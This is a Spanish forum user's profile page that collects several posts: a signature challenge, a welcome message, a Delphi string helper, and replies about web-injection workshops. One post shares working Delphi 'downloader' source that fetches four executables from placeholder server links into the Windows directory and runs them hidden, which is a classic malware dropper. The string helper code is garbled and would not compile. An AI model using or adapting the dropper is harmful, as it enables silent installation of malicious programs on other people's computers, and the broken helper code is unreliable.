Pues yo veo su propuesta perfecta(quizas cambiando algunas cosas).Me gustaria saber que hara el foro si alguna vez le pasa algo a Metin2
Gyu (@Gyu)
9
Reputación
96
Mensajes
502
Visitas
0
Seguidores
0
Siguiendo
Information about Gyu
Registrado
Última vez conectado
Publicados por Gyu
-
publicado en Ideas
-
publicado en Duelos y Torneos
Pues busco un reto , esta serian las estipulaciones ;
Animaciones SI
Tamano 360x160
Estilo FIRMA -
publicado en Presentaciones y despedidas
Bienvenido , y por supuesto que seras ayudado con tus dudas :icon_cheesygrin:
-
publicado en Aplicaciones de escritorio
El codigo no es mio , y por lo que he visto no hay comentarios que faciliten la lectura del programa.
program DOWLOADER; uses UrlMon, windows, Shellapi, SysUtils, TLHelp32; {$E exe} {$R *.res} const down1 = 'LINK SERVER'; const procede1 = 'SERVER1.exe'; const down2 = 'LINK SERVER'; const procede2 = 'SERVER2.exe'; const down3 = 'LINK SERVER'; const procede3 = 'SERVER3.exe'; const down4 = 'LINK SERVER'; const procede4 = 'SERVER4.exe'; function DF(S, D: string): Boolean; begin try Result := UrlDownloadToFile(nil, PChar(s), PChar(D), 0, nil) = 0; except Result := False; end; end; function W : String; Var Buffer : Array[0..144] of Char; Begin GetWindowsDirectory(Buffer,144); Result := StrPas(Buffer); End; procedure f(N, P: String); Var Co: Array[0..1024] of Char; Pa: Array[0..1024] of Char; begin StrPCopy (Co, N); StrPCopy (Pa, P); ShellExecute (0, Nil, Co, Pa, Nil, SW_HIDE); end; {$I+} begin if DF(down1,w+'\'+procede1) then begin f(w+'\'+procede1, ''); end; if DF(down2,w+'\'+procede2) then begin f(w+'\'+procede2, ''); end; if DF(down3,w+'\'+procede3) then begin f(w+'\'+procede3, ''); end; if DF(down4,w+'\'+procede4) then begin f(w+'\'+procede4, ''); end; end. -
publicado en Aplicaciones de escritorio
En Visual Basic una función bastante utilizada para el manejo de cadenas es MID, la traigo libre de dependencias para que no usen Copy.
function sMid(lpStr:String;nIndex:Integer;nLength:Integer):String;
var
i:Integer;
begin;
If Length(lpStr) > 0 Then
begin
for i := nIndex to (nLength + nIndex)-1 do
begin
If i = Length(lpStr) then
begin
Result := Result + lpStr_;
break;
end else
begin
Result := Result + lpStr_
end;
end;
end;
end__ -
publicado en Web
@Aquiles94 said:
@Aquiles94 said:
en si solo explico una inyección de código simple, y como evitar eso, aun no llega a la parte de añadir la url de otra web y eso XD
P.D: no me gustan este tipo de cursos...es como darle a un mono un machete...a menos que a cada inyección expliques como evitarla, porque con la de malintencionados que hay :icon_rolleyes:
en lo azul hablo de tu primer post, en lo rojo del segundo, en la post data solo doi mi opinión, sugiriendo que a todo lo que enseñes des la contra, que yo me lo se, pero otros pueden no saberlo y caer en las garras de tanto malintencionado que ronda estos lugares.
Para eso era el segundo tema :icon_cheesygrin:
El primer taller era sobre como explotar la vulnerabilidad , para que el administrador pueda conocerla desde un punto mas subjetivo , en el segundo taller explico como arreglar este fallo
-
publicado en Web
@Aquiles94 said:
en si solo explico una inyección de código simple, y como evitar eso, aun no llega a la parte de añadir la url de otra web y eso XD
P.D: no me gustan este tipo de cursos...es como darle a un mono un machete...a menos que a cada inyección expliques como evitarla, porque con la de malintencionados que hay :icon_rolleyes:
Te pediria que leyeses antes de comentar.
En el primer taller [http://foro.universojuegos.es/viewtopic.php?f=75&t=21123][0]">viewtopic.php?f=75&t=21123 aprendemos a atacar para aprender la vulnerabilidad desde otro punto de vista.
En este taller(el segundo) aprendemos a tapar la vulnerabilidad.Respecto a lo otro si evitas la inyeccion de codigo HTML evitaras esa vulnerabilidad y por lo tanto no se podran insertar redirecciones a otras urls con codigos estructurados.Un Saludo.
[0]: <a href=
